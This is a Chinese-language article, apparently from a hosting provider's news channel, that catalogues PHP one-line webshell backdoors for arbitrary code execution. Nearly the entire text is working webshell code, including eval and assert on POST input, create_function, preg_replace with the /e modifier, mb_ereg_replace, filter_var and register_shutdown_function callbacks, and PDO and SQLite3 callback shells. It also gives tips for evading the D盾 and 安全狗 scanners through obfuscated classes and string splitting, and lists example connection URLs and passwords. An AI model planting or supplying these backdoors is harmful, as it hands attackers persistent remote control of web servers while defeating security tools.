您好,登錄后才能下訂單哦!
php任意代碼執(zhí)行的一句話后門有哪些,相信很多沒有經(jīng)驗的人對此束手無策,為此本文總結(jié)了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個問題。
php任意代碼執(zhí)行的一句話后門,我們喜歡用的是傳統(tǒng)的eval,php5,7通用。
<?php @eval($_POST['a']) ?>
但由于eval不能拆分,早期也有人喜歡用assert,這樣通過編碼和拆分assert,隱蔽性更高
<?php @assert($_POST['a']) ?>
雖然有人說assert在php7.0及其以上版本被禁用,但實際上并沒有禁用,而是和eval一樣禁止拆分了。
絕大部分一句話后門,都跟這兩個函數(shù)(其實不是函數(shù))有關(guān)
create_function,它的作用是創(chuàng)建一個匿名函數(shù),在內(nèi)部也相當于執(zhí)行了一次eval。php5,7都可用
<?php $st=@create_function('',$_POST['a']);$st();?>
/e修飾符,也就是大家熟知的preg_replace。這個則是真的php7用不了了,僅限php5。
<?php @preg_replace('/.*/e',$_POST['a'],'');?>
除了preg_replace之外,還有一個和它類似的函數(shù)。
<?php @preg_filter('/.*/e',$_POST['a'],'');?>
這兩個都是僅限php5的,php7也想用這種方法怎么辦呢?有辦法,php并沒有完全將/e修飾符趕盡殺絕。
<?php @mb_ereg_replace('.*',$_POST['a'],'','ee');?> <?php @mb_eregi_replace('.*',$_POST['a'],'','ee');?>
它們甚至還有別名
<?php @mbereg_replace('.*',$_POST['a'],'','ee');?> <?php @mberegi_replace('.*',$_POST['a'],'','ee');?>
上面這些都開發(fā)出來很久了,單純拿這些去繞D盾是很難的,這里也不是來教大家繞D盾的。想繞的話,其實D盾對類的檢測力度不高,自己寫個混淆一點的類,php5用assert拆分,php7用create_function拆分其實就很容易繞過去。舉個例子
//該例子為create_function拆分,php5.3.29和5.2.17測試完不可行,php5.4.45-php7都可行。故php5用assert拆分,php7用create_function拆分這樣最穩(wěn) <?php class create{ public $filter = ['q'=>'_function']; public $value = ''; public function __construct(){ $this->value = $_POST['a']; $name=get_class($this).$this->filter['q']; $st=$name('',$this->value); $st(); } } $a = new create();
回調(diào)函數(shù)的本質(zhì)是下面這種代碼,以函數(shù)作為變量。
<?php $_GET['a']($_GET['b']);?>
比較老的回調(diào)后門
URL地址:http://127.0.0.1/1.php 連接密碼:pass
php中call_user_func是執(zhí)行回調(diào)函數(shù)的標準方法,這是比較老的后門了:
<?php call_user_func('assert', $_REQUEST['pass']);
<?php call_user_func_array('assert', array($_REQUEST['pass']));
真免殺回調(diào)后門(過安全狗,D盾)
URL地址:http://127.0.0.1/1.php?e=assert 連接密碼:pass
<?php filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
<?php filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
<?php $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['pass']);
<?php mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
下面這兩個回調(diào)后門,都是依靠php擴展庫(pdo和sqlite3)來實現(xiàn)的:
<?php $e = $_REQUEST['e']; $db = new PDO('sqlite:sqlite.db3'); $db->sqliteCreateFunction('myfunc', $e, 1); $sth = $db->prepare("SELECT myfunc(:exec)"); $sth->execute(array(':exec' => $_REQUEST['pass']));
上面這種sqlite方法是依靠PDO執(zhí)行的。我們也可以直接調(diào)用sqlite3的方法構(gòu)造回調(diào)后門,前提是php5.3以上。
<?php $e = $_REQUEST['e']; $db = new SQLite3('sqlite.db3'); $db->createFunction('myfunc', $e); $stmt = $db->prepare("SELECT myfunc(?)"); $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT); $stmt->execute();
看完上述內(nèi)容,你們掌握php任意代碼執(zhí)行的一句話后門有哪些的方法了嗎?如果還想學到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。